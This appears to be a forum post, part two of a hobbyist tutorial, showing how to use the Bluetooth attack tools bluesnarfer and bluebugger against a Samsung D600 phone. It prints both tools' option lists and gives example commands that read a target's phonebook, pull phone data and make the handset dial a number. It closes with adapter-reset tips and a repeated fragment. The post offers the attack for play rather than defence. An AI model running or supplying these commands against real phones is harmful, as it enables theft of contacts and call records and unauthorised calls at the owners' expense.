Part 2
Ok lets get to it ...... Start a shell and lets take a look at bluesnarfer's options so type:
bt ~ # bluesnarfer
And you should get :
Ok so now we have some options lets begin type:Code:bluesnarfer, version 0.1 - usage: bluesnarfer [options] [ATCMD] -b bt_addr ATCMD : valid AT+CMD (GSM EXTENSION) TYPE : valid phonebook type .. example : "DC" (dialed call list) "SM" (SIM phonebook) "RC" (recevied call list) "XX" much more -b bdaddr : bluetooth device address -C chan : bluetooth rfcomm channel -c ATCMD : custom action -r N-M : read phonebook entry N to M -w N-M : delete phonebook entry N to M -f name : search "name" in phonebook address -s TYPE : select phonebook memory storage -l : list aviable phonebook memory storage -i : device info
bluesnarfer [options] -C 7 -b <taget MAC>
for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55
And the hack should start ........
Now bluebugger Type:
Bluebugger -h
And you should get :
Again now we have are options lets hack .............. Type:Code:bluebugger 0.1 (cant post urls :D) ----------------------------------------- Usage: bluebugger [OPTIONS] -a <addr> [MODE] -a <addr> = Bluetooth address of target Options: -------- -m <name> = Name to use when connecting (default: '') -d <device> = Device to use (default: '/dev/rfcomm') -c <channel> = Channelto use (default: 17) -n = No device name lookup -t <timeout> = Timeout in seconds for name lookup (default: 5) -o <file> = Write output to <file> Mode: ----- info = Read Phone Info (default) phonebook = Read Phonebook (default) messages = Read SMS Messages (default) dial <num> = Dial number ATCMD = Custom Command (e.g. '+GMI') Note: Modes can be combined, e.g. 'info phonebook +GMI'
bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]
for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN
And again you should see some results.
The only downside to hacking into my D600 is that you still have to allow it on the phone so its not exactly HACKING the D600 but its a good training session. And now you can go forth and play.
Hope you lot can understand my bad spelling ETC and have fun
PS : Can sombody swap these posts around? Sorry my faultand oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:
hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up
And all should be well.


So here's how I hacked my samsung d600.

and oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:
